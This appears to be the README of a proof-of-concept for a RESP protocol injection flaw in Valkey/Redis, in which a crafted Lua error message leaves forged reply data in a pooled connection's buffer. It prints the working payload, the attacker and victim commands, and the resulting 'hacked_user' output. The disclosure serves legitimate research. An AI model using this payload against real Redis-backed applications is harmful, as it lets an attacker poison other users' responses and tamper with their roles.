# RESP Protocol Injection PoC

Proof-of-concept demonstrating RESP Protocol Injection vulnerability via Lua script error messages in Valkey/Redis.

## Files

### backend.py

Flask backend simulating a web application with shared Valkey connection (connection pooling).

**Endpoints:**
| Method | Endpoint | Description |
|--------|----------|-------------|
| POST | `/api/user/role` | Set user role |
| GET | `/api/user/role` | Get user role |
| POST | `/api/process` | Execute Lua script |

**Usage:**
```bash
python backend.py <Valkey host> <Valkey port> [password]

# Examples
python backend.py 127.0.0.1 6379
python backend.py 127.0.0.1 6379 mypassword
```

---

### attacker_client.py

Injects malicious RESP data into the socket buffer via Lua script error message.

**Payload:**
```lua
error(redis.error_reply("INJECTED\r\n$11\r\nhacked_user"))
```

**Usage:**
```bash
python attacker_client.py
```

---

### victim_client.py

Legitimate client that sets and retrieves user roles.

**Usage:**
```bash
python victim_client.py set    # Set role to "normal_user"
python victim_client.py get    # Get current role
```

---

## Attack Demonstration

### Prerequisites

```bash
pip install flask requests
```

### Steps

**Terminal 1 - Start Backend:**
```bash
python backend.py 127.0.0.1 6379
```

**Terminal 2 - Set Role:**
```bash
python victim_client.py set
# Output: 'role':'normal_user' has been set.

python victim_client.py get
# Output: 'role':'normal_user'
```

**Terminal 3 - Attack:**
```bash
python attacker_client.py
# Output: Socket poisoning successful
```

**Terminal 2 - Get Role (After Attack):**
```bash
python victim_client.py get
# Output: 'role':'hacked_user'
```

---

## Attack Flow

```
1. Victim sets role
   victim_client.py set --> backend --> Valkey
                                        SET user:user:role "normal_user"

2. Attacker injects payload
   attacker_client.py --> backend --> Valkey
                                      EVAL 'error(...)' 0

   Backend reads: "-ERR INJECTED\r\n"
   Buffer remains: "$11\r\nhacked_user"

3. Victim gets role
   victim_client.py get --> backend --> Valkey
                                        GET user:user:role

   Backend reads from buffer: "$11\r\nhacked_user"
   Victim receives: "hacked_user"
```
